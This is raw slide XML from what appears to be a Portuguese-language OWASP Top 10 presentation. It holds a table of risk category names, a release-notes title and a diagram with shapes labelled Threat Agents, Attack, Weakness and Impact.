                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Incorreta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Segurança</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff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t>A9 – Utilização de Componentes Vulneráveis</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Conhecidos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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chemeClr val="tx2">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="277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t>A10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Redirecionamentos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Encaminhamentos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Inválidos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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t>A10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Redirecionamentos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Encaminhamentos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Inválidos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="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r h="277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t>A9 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Proteção</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Insuficiente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Nível</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Transporte</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="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err="1" smtClean="0"/>
                        <a:t>Agrupado</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> com </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>2010-A7 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>criando</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>2013-A6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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chemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notas da Versão</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33367696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304800" y="2085975"/>
            <a:ext cx="6172200" cy="2105025"/>
            <a:chOff x="304800" y="2085975"/>
            <a:chExt cx="6172200" cy="2105025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="57" name="AutoShape 117"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2418" y="2736"/>
                <a:ext cx="336" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 25000"/>
                  <a:gd name="adj2" fmla="val 25000"/>
                  <a:gd name="adj3" fmla="val 19444"/>
                  <a:gd name="adj4" fmla="val 66667"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505075"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="144" y="1344"/>
                <a:ext cx="192" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1536"/>
                <a:ext cx="0" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="96" y="1776"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1776"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="96" y="1632"/>
                <a:ext cx="288" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 80130"/>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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2085975"/>
              <a:ext cx="516488" cy="302327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 12500"/>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eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="AutoShape 117"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2418" y="2736"/>
                <a:ext cx="336" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 25000"/>
                  <a:gd name="adj2" fmla="val 25000"/>
                  <a:gd name="adj3" fmla="val 19444"/>
                  <a:gd name="adj4" fmla="val 66667"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924175"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="144" y="1344"/>
                <a:ext cx="192" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1536"/>
                <a:ext cx="0" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="96" y="1776"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1776"/>
                <a:ext cx="144" cy="192"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="96" y="1632"/>
                <a:ext cx="288" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2924175"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
